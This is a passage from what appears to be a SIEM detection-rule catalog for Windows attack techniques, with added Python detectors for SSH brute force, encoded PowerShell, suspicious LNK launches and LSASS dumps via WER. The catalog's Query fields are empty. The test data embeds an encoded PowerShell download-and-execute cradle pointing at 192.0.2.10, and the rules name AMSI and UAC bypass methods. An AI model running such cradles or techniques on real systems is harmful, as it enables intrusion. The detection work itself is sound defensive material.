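    events: List[Tuple[str, datetime]] = []
    for line in lines:
        m = _INVALID_USER_RE.match(line)
        if m:
            events.append((m.group("ip"), datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")))
    events.sort(key=lambda e: e[1])  # the window logic assumes time order
    return sliding_window_hits(events, threshold, timedelta(seconds=window_seconds))


# Constructed auth.log excerpt: one source tries eight unknown usernames in
# eight seconds, another tries two spread three minutes apart.
SAMPLE_AUTH_LOG = [
    f"May  1 10:00:{i:02d} bastion sshd[{1200 + i}]: Invalid user {name} from 203.0.113.7 port {40000 + i}"
    for i, name in enumerate(["admin", "oracle", "test", "ubuntu", "git", "postgres", "pi", "deploy"])
] + [
    "May  1 10:00:05 bastion sshd[1300]: Accepted publickey for alice from 10.0.0.12 port 51234 ssh2",
    "May  1 10:00:10 bastion sshd[1301]: Invalid user guest from 192.0.2.3 port 41000",
    "May  1 10:03:10 bastion sshd[1302]: Invalid user guest from 192.0.2.3 port 41001",
]

if __name__ == "__main__":
    for ip, when in detect_invalid_user_bursts(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: threshold reached at {when:%H:%M:%S}")
```

The key choice matters: keyed on source IP the rule catches one scanner; keyed on the target host it also catches a distributed spray that stays under eight per source.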
LP_NotPetya Ransomware Activity Detected
Trigger Condition: This alert is triggered whenever it detects NotPetya ransomware activity, where extracted passwords are passed back to the main module via a named pipe, the file system journal of drive C: is deleted and Windows event logs are cleared using the wevtutil binary.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Obfuscation Script Usage via MSHTA to Execute Vbscript
Trigger Condition: This alert is triggered whenever execution of an Invoke-Obfuscation PowerShell script that uses mshta to execute VBScript is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: This alert is triggered whenever unauthorized transfer of sensitive data is detected via mail applications, cloud applications or other media. The lists used are RESIGNED_EMPLOYEES, KNOWN_DOMAINS and CLOUD_APPLICATIONS.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Possible Emotet Activity Detected
Trigger Condition: This alert is triggered whenever it detects process creation events related to Emotet.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible File Transfer Using Finger Detected
Trigger Condition: This alert is triggered whenever execution of Finger.exe is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Impacket Lateral Movement Detected
Trigger Condition: This alert is triggered whenever it detects instances of lateral movement using the Impacket framework, specifically the wmiexec, dcomexec, atexec and smbexec tools.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible SquiblyTwo Detected
Trigger Condition: This alert is triggered whenever it detects the WMI SquiblyTwo attack, including a possibly renamed WMIC binary, by looking at the imphash.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
Trigger Condition: This alert is triggered when usage of suspicious tools to bypass User Account Control (UAC) is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows
Query:
LP_PowerShell ADRecon Execution
Trigger Condition: This alert is triggered whenever the execution of the ADRecon PowerShell script for AD reconnaissance is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows
Query:
LP_PowerShell Encoded FromBase64String Detected
Trigger Condition: This alert detects the use of the .NET method “FromBase64String” to decode a Base64-encoded string. Base64 is a widely used encoding scheme that represents binary data in an ASCII string format. It is often used to encode data for transfer over networks or to store data in databases or files.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
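FromBase64String on its own is not evidence of anything; what the analyst wants from the alert is the decoded content, and attackers routinely nest it inside an -EncodedCommand stage. The following is an added example, not the page's query or vendor code, that pulls every Base64 payload reachable from a command line, distinguishes the UTF-16LE encoding PowerShell uses for -EncodedCommand from the UTF-8 usually fed to FromBase64String, and recurses into decoded stages. The two-stage command line and the 192.0.2.10 address are constructed; the -e/-ec/-enc prefixes the pattern accepts reflect PowerShell's parameter-prefix matching.

```python
import base64
import re
from typing import List, Tuple

# [Convert]::FromBase64String("...") with a literal argument.
_FROM_B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)
# -EncodedCommand and the prefixes PowerShell accepts for it (-e, -ec, -enc, ...);
# the pattern deliberately does not match -ExecutionPolicy or -ep.
_ENC_FLAG_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _bytes_to_text(raw: bytes) -> str:
    """Decode as UTF-16LE when every other byte is NUL (ASCII-range UTF-16), else UTF-8."""
    if len(raw) >= 4 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_powershell_payloads(cmdline: str, max_depth: int = 3) -> List[Tuple[str, str]]:
    """Return (mechanism, decoded_text) pairs for every Base64 payload reachable from
    the command line, recursing into decoded stages up to `max_depth`."""
    found: List[Tuple[str, str]] = []

    def walk(text: str, depth: int) -> None:
        if depth > max_depth:
            return
        for m in _ENC_FLAG_RE.finditer(text):
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
            except ValueError:  # not valid Base64: some other -e* switch
                continue
            found.append(("EncodedCommand", decoded))
            walk(decoded, depth + 1)
        for m in _FROM_B64_RE.finditer(text):
            try:
                raw = base64.b64decode(m.group(1), validate=True)
            except ValueError:
                continue
            decoded = _bytes_to_text(raw)
            found.append(("FromBase64String", decoded))
            walk(decoded, depth + 1)

    walk(cmdline, 0)
    return found


# Constructed two-stage command line: -enc wraps a script that itself decodes a
# UTF-8 Base64 download cradle. 192.0.2.10 is a documentation address.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"
STAGE2 = ('$s=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("'
          + base64.b64encode(INNER.encode()).decode() + '")); IEX $s')
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(STAGE2.encode("utf-16-le")).decode())

if __name__ == "__main__":
    for how, text in decode_powershell_payloads(SAMPLE_CMDLINE):
        print(f"[{how}] {text}")
```

Only literal string arguments are decoded; a payload assembled at runtime from variables or string concatenation still needs Script Block Logging (event 4104) to be seen in clear.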
LP_PowerShell Rundll32 Remote Thread Creation Detected
Trigger Condition: This alert is triggered whenever it detects the creation of a remote thread by a PowerShell process in a rundll32 process.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Powershell AMSI Bypass via dotNET Reflection
Trigger Condition: This alert is triggered whenever it detects a reference to amsiInitFailed, which can be used to disable AMSI scanning. AMSI is a feature in Windows that allows applications to request the scanning of scripts and other content for malicious behavior.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Powershell Code Execution via SyncAppvPublishingServer
Trigger Condition: This alert is triggered when an arbitrary PowerShell command is executed via SyncAppvPublishingServer.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Creation via Time Travel Tracer
Trigger Condition: This alert is triggered when a new child process is spawned via tttracer.exe.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Proxy Execution via Xwizard
Trigger Condition: This alert is triggered whenever the xwizard tool is executed with the “RunWizard” argument and a CLSID to achieve proxy execution.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Pulse Secure Arbitrary File Reading Detected
Trigger Condition: This alert is triggered whenever exploitation of arbitrary file reading vulnerability (CVE-2019-11510) in Pulse Secure is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, IDS, IPS
Query:
LP_Reconnaissance using Windows Binaries Detected
Trigger Condition: This alert is triggered whenever possible reconnaissance activity using Windows binaries, such as the execution of several discovery commands, is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Registry Key Import Detected
Trigger Condition: This alert is triggered whenever registry key import is detected via regedit.exe.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Registry Run Key Pointing to a Suspicious Folder
Trigger Condition: This alert is triggered whenever it detects registry modification where the value of “Run” key is pointing to a suspicious folder.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Remote Code Execution using WMI Win32_Service Class over WinRM
Trigger Condition: This alert is triggered when an application whitelisting bypass and arbitrary unsigned code execution technique using winrm.vbs is attempted. It detects the execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and a copied (possibly renamed) cscript.exe.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Run PowerShell Script from ADS Detected
Trigger Condition: This alert is triggered whenever PowerShell script execution from Alternate Data Stream (ADS) is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_RunOnce Registry Key Configuration Change
Trigger Condition: This alert is triggered when the configuration of the RunOnce registry key is changed.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Rundll32 Internet Connection Detected
Trigger Condition: This alert is triggered whenever it detects a rundll32 that communicates with public IP addresses.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Scheduled Task Creation Detected
Trigger Condition: This alert is triggered whenever it detects the creation of a scheduled task.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Shell Spawn via HTML Help Detected
Trigger Condition: This alert is triggered when hh.exe (HTML Help) spawns shell processes.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Atbroker Registry Change Detected
Trigger Condition: This alert is triggered whenever creation/modification of Assistive Technology registry value is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
Trigger Condition: This alert is triggered whenever it detects execution of the C# or F# interactive console by scripting utilities such as WScript, CScript, PowerShell, etc.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Child Process Creation via OneNote
Trigger Condition: This alert is triggered whenever it detects creation of suspicious child processes, execution of binaries from non-default paths, and script file execution through OneNote.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Code Page Switch Detected
Trigger Condition: This alert is triggered whenever the code page in the command line or a batch script is switched to a different, typically rare, language code page.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious ConfigSecurityPolicy Execution Detected
Trigger Condition: This alert is triggered whenever file upload is detected via ConfigSecurityPolicy binary.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious DLL Execution Using Windows Address Book
Trigger Condition: This alert is triggered when a suspicious DLL is executed using wab.exe.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Debugger Registration Detected
Trigger Condition: This alert is triggered whenever it detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Download Using Diantz
Trigger Condition: This alert is triggered when a remote file is downloaded suspiciously using diantz.exe and is stored by compressing it into a .cab file on the local machine.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution from Outlook
Trigger Condition: This alert is triggered whenever it detects EnableUnsafeClientMailRules used for Script Execution from Outlook.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution of Dump64
Trigger Condition: This alert is triggered when suspicious usage of dump64.exe is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution of LNK File
Trigger Condition: This alert is triggered whenever execution of a suspicious LNK file that spawns PowerShell or the command prompt with high entropy in the command field is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
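The entropy test in this rule deserves a concrete threshold and a known weakness: UTF-16LE-encoded commands (the -EncodedCommand form) contain so many repeated characters after Base64 encoding that their per-character entropy stays well below that of a raw Base64 blob. The following is an added example, not the page's query or vendor code, that scores the command line of shells spawned by explorer.exe, which is how this example approximates "launched from an LNK" (an assumption); the 5.0 bits/char entropy threshold and the 100-character token length fallback are tuning assumptions, and the process records are constructed.

```python
import base64
import math
from collections import Counter
from typing import Dict, Iterable, List

# Thresholds are assumptions to tune per environment: ordinary command lines sit
# around 4-4.5 bits/char and raw Base64 blobs above 5; UTF-16LE-encoded commands
# score lower than that, so a long whitespace-free token is a second trigger.
ENTROPY_THRESHOLD = 5.0
LONG_TOKEN_THRESHOLD = 100
SHELLS = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe")


def shannon_entropy(text: str) -> float:
    """Shannon entropy of the string in bits per character."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def longest_token(text: str) -> int:
    """Length of the longest whitespace-free run, e.g. an encoded payload."""
    return max((len(t) for t in text.split()), default=0)


def is_suspicious_lnk_launch(event: Dict) -> bool:
    """Shell spawned by explorer.exe (assumed LNK launch) whose command line is
    either high-entropy or carries an unusually long single token."""
    parent = event.get("parent_image", "").lower()
    image = event.get("image", "").lower()
    if not parent.endswith("\\explorer.exe") or not image.endswith(SHELLS):
        return False
    cmd = event.get("command_line", "")
    return shannon_entropy(cmd) >= ENTROPY_THRESHOLD or longest_token(cmd) >= LONG_TOKEN_THRESHOLD


def find_suspicious_lnk_launches(events: Iterable[Dict]) -> List[Dict]:
    return [e for e in events if e.get("event_id") == 1 and is_suspicious_lnk_launch(e)]


# Constructed Sysmon event 1 records; the encoded blob wraps a download cradle
# pointing at the documentation address 192.0.2.10.
_ENC_BLOB = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')".encode("utf-16-le")
).decode()
SAMPLE_PROCESS_EVENTS = [
    {"event_id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /c echo hello'},
    {"event_id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _ENC_BLOB},
    {"event_id": 1, "parent_image": r"C:\Windows\System32\svchost.exe",  # not an LNK launch
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -enc " + _ENC_BLOB},
]

if __name__ == "__main__":
    for ev in SAMPLE_PROCESS_EVENTS:
        cmd = ev["command_line"]
        print(f"{shannon_entropy(cmd):.2f} bits/char, longest token {longest_token(cmd)}: "
              f"{'SUSPICIOUS' if is_suspicious_lnk_launch(ev) else 'ok'}")
```

Sysmon's ParentImage is explorer.exe for anything the user double-clicks, so the parent filter narrows scope but does not prove an LNK was involved; the LNK file itself surfaces in event 11 (FileCreate) if it was just dropped.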
LP_Suspicious Files Dropped in Perflogs Folder
Trigger Condition: This alert is triggered whenever an EXE or DLL file is dropped in the Windows PerfLogs directory.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious HWP Sub Processes Detected
Trigger Condition: This alert is triggered whenever it detects suspicious Hangul Word Processor (HWP) sub-processes that could indicate exploitation.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Invocation of Microsoft Workflow Compiler
Trigger Condition: This alert is triggered when usage of Microsoft Workflow Compiler is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious LSASS Dump Creation in CrashDumps
Trigger Condition: This alert is triggered whenever it detects the creation of an LSASS dump file in the %LocalAppData%\CrashDumps folder, which in the context of NT AUTHORITY\SYSTEM is C:\Windows\System32\config\systemprofile\AppData\Local\CrashDumps, a pattern seen in the LSASS Shtinkering attack.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious LoadAssembly PowerShell Diagnostic Script Execution
Trigger Condition: This alert detects the use of a Microsoft signed script to execute commands and bypass AppLocker.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Outbound RDP Connections Detected
Trigger Condition: This alert is triggered whenever it detects non-standard tools initiating outbound connections over TCP port 3389, indicating possible lateral movement using Remote Desktop Protocol (RDP).
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious PowerShell Parameter Substring Detected
Trigger Condition: This alert is triggered whenever it detects PowerShell invocation with a suspicious parameter substring.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious RDP Redirect Using TSCON Detected
Trigger Condition: This alert is triggered whenever it detects a suspicious RDP session redirect using tscon.exe.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Remote Binary Usage Detected
Trigger Condition: This alert is triggered whenever the remote.exe binary is used to bypass application whitelisting and execute a local or remote file.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Scripting in a WMI Consumer
Trigger Condition: This alert is triggered whenever it detects suspicious scripting in WMI Event Consumers.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, PowerShell
Query:
LP_Suspicious Setup Information File Invoked via DefaultInstall
Trigger Condition: This alert gets triggered when InfDefaultInstall.exe is used to install an INF file.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Svchost Process Detected
Trigger Condition: This alert is triggered whenever any suspicious svchost process creation is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Sysmon Driver Unload Detected
Trigger Condition: This alert is triggered when a suspicious unload of the SysmonDrv filter driver is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Usage of SQLToolsPS Detected
Trigger Condition: This alert is triggered when it detects proxy execution of PowerShell code through SQLToolsPS.exe.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Usage of Windows Binaries for Ingress Tool Transfer
Trigger Condition: This alert is triggered whenever it detects suspicious use of Windows binaries indicative of ingress tool transfer attempts.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious WMIC ActiveScriptEventConsumer Created
Trigger Condition: This alert is triggered whenever WMIC is executed to create an event consumer.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: This alert is triggered whenever a Windows program executable is started from a suspicious folder.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_System Network Configuration Discovery
Trigger Condition: This alert is triggered whenever discovery of network configuration via system utilities like ipconfig, route, netsh, etc is detected.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_TerraMaster TOS CVE-2020-28188 Exploitation
Trigger Condition: This alert is triggered whenever possible exploitation of the TerraMaster TOS vulnerability CVE-2020-28188 is detected. CVE-2020-28188 is a remote command execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 that allows remote unauthenticated attackers to inject OS commands.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_UAC Bypass via CMLUA or CMSTPLUA
Trigger Condition: This alert is triggered whenever the CMLUA or CMSTPLUA DLL is loaded to perform a User Account Control (UAC) bypass.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon
Query:
Trigger Condition: This alert is triggered whenever high risk vulnerability is detected in low impact assets.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_VM - Medium Risk Vulnerability on High Impact Assets
Trigger Condition: This alert is triggered whenever medium risk vulnerability is detected in high impact assets.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_VM - Medium Risk Vulnerability on Medium Impact Assets
Trigger Condition: This alert is triggered whenever medium risk vulnerability is detected in medium impact assets.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Qualys, Vulnerability Management
Query:
LP_VMware View Planner CVE-2021-21978 Exploitation
Trigger Condition: This alert is triggered whenever possible exploitation of the VMware View Planner vulnerability CVE-2021-21978 is detected. CVE-2021-21978 is a flaw caused by improper input validation and a lack of authorization, leading to arbitrary file upload in the logupload web application.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_WER Full User Mode Dumps Enable Detected
Trigger Condition: This alert is triggered upon detecting a modification of the registry value “DumpType” to 2 under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps key. This registry configuration, introduced with Windows Server 2008 and Windows Vista SP1, enables the collection and local storage of full user-mode dumps after a user-mode application crash. Note that applications employing custom crash reporting mechanisms, such as .NET applications, are not supported by this feature.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
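This rule and LP_Suspicious LSASS Dump Creation in CrashDumps above are two halves of one chain: WER is first configured to write full user-mode dumps, then LSASS is made to "crash" so that WerFault.exe, a signed Microsoft binary, produces the dump. The following is an added example, not the page's query or vendor code, that triages constructed Sysmon event 13 (registry value set) and event 11 (file create) records for both halves, including the per-application LocalDumps\lsass.exe\DumpType subkey that WER also honours. The field names are the Sysmon ones in lower case, and the DWORD rendering "DWORD (0x00000002)" is Sysmon's.

```python
import re
from typing import Dict, Iterable, List

# HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\DumpType, or the
# per-application variant ...\LocalDumps\<app.exe>\DumpType. DumpType 2 = full dump.
_DUMPTYPE_RE = re.compile(
    r"\\Windows Error Reporting\\LocalDumps(?:\\(?P<app>[^\\]+))?\\DumpType$", re.IGNORECASE)
_DWORD_RE = re.compile(r"0x([0-9a-f]+)", re.IGNORECASE)
# WER writes <image>.<pid>.dmp under %LocalAppData%\CrashDumps; for LSASS (SYSTEM) that is
# C:\Windows\System32\config\systemprofile\AppData\Local\CrashDumps.
_LSASS_DUMP_RE = re.compile(r"\\CrashDumps\\lsass\.exe\.\d+\.dmp$", re.IGNORECASE)


def triage_lsass_wer_events(events: Iterable[Dict]) -> List[Dict[str, str]]:
    """Return one finding per event that enables full WER dumps or drops an LSASS dump."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        eid = ev.get("event_id")
        if eid == 13:  # Sysmon RegistryEvent (value set)
            m = _DUMPTYPE_RE.search(ev.get("target_object", ""))
            d = _DWORD_RE.search(ev.get("details", ""))
            if m and d and int(d.group(1), 16) == 2:
                findings.append({"type": "wer_full_dumps_enabled",
                                 "scope": m.group("app") or "all applications",
                                 "image": ev.get("image", ""),
                                 "object": ev["target_object"]})
        elif eid == 11:  # Sysmon FileCreate
            path = ev.get("target_filename", "")
            if _LSASS_DUMP_RE.search(path):
                findings.append({"type": "lsass_dump_in_crashdumps",
                                 "image": ev.get("image", ""), "path": path})
    return findings


# Constructed Sysmon records covering both halves of the chain plus benign noise.
SAMPLE_EVENTS = [
    {"event_id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\DumpType",
     "details": "DWORD (0x00000002)"},
    {"event_id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\DumpCount",
     "details": "DWORD (0x0000000a)"},
    {"event_id": 13, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\lsass.exe\DumpType",
     "details": "DWORD (0x00000002)"},
    {"event_id": 13, "image": r"C:\Windows\System32\msiexec.exe",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\myapp.exe\DumpType",
     "details": "DWORD (0x00000001)"},
    {"event_id": 11, "image": r"C:\Windows\System32\WerFault.exe",
     "target_filename": r"C:\Windows\System32\config\systemprofile\AppData\Local\CrashDumps\lsass.exe.712.dmp"},
    {"event_id": 11, "image": r"C:\Windows\System32\WerFault.exe",
     "target_filename": r"C:\Users\bob\AppData\Local\CrashDumps\notepad.exe.4242.dmp"},
]

if __name__ == "__main__":
    for f in triage_lsass_wer_events(SAMPLE_EVENTS):
        print(f)
```

Because WerFault.exe is the legitimate writer of these files, an allow-list on the creating image would suppress exactly the case this rule exists for; the discriminator is the dumped process name in the path, not the writer.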
LP_WMI Persistence - Script Event Consumer Detected
Trigger Condition: This alert is triggered whenever it detects Windows Management Instrumentation (WMI) script event consumers.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_WSL Execution Detected
Trigger Condition: This alert is triggered whenever the Windows Subsystem for Linux (WSL) binary is used to execute Linux commands.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_WannaCry Sources in Connections to Sinkhole Domain
Trigger Condition: This alert is triggered whenever a source tries to connect to the WannaCry sinkhole domain.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Firewall, IDS, IPS, Web Server
Query:
LP_Windows Defender Antivirus Definitions Removal Detected
Trigger Condition: This alert is triggered when Microsoft Defender Antivirus signature definitions are removed from the system.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
Trigger Condition: This alert is triggered whenever it detects suspicious parent processes of well-known Windows processes.
ATT&CK Category: N/A
ATT&CK Tag: N/A
ATT&CK ID: N/A
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Windows RDP Port Modified
Trigger Condition: This alert is triggered whenever the Windows Remote Desktop Protocol (RDP) port configuration is modified.
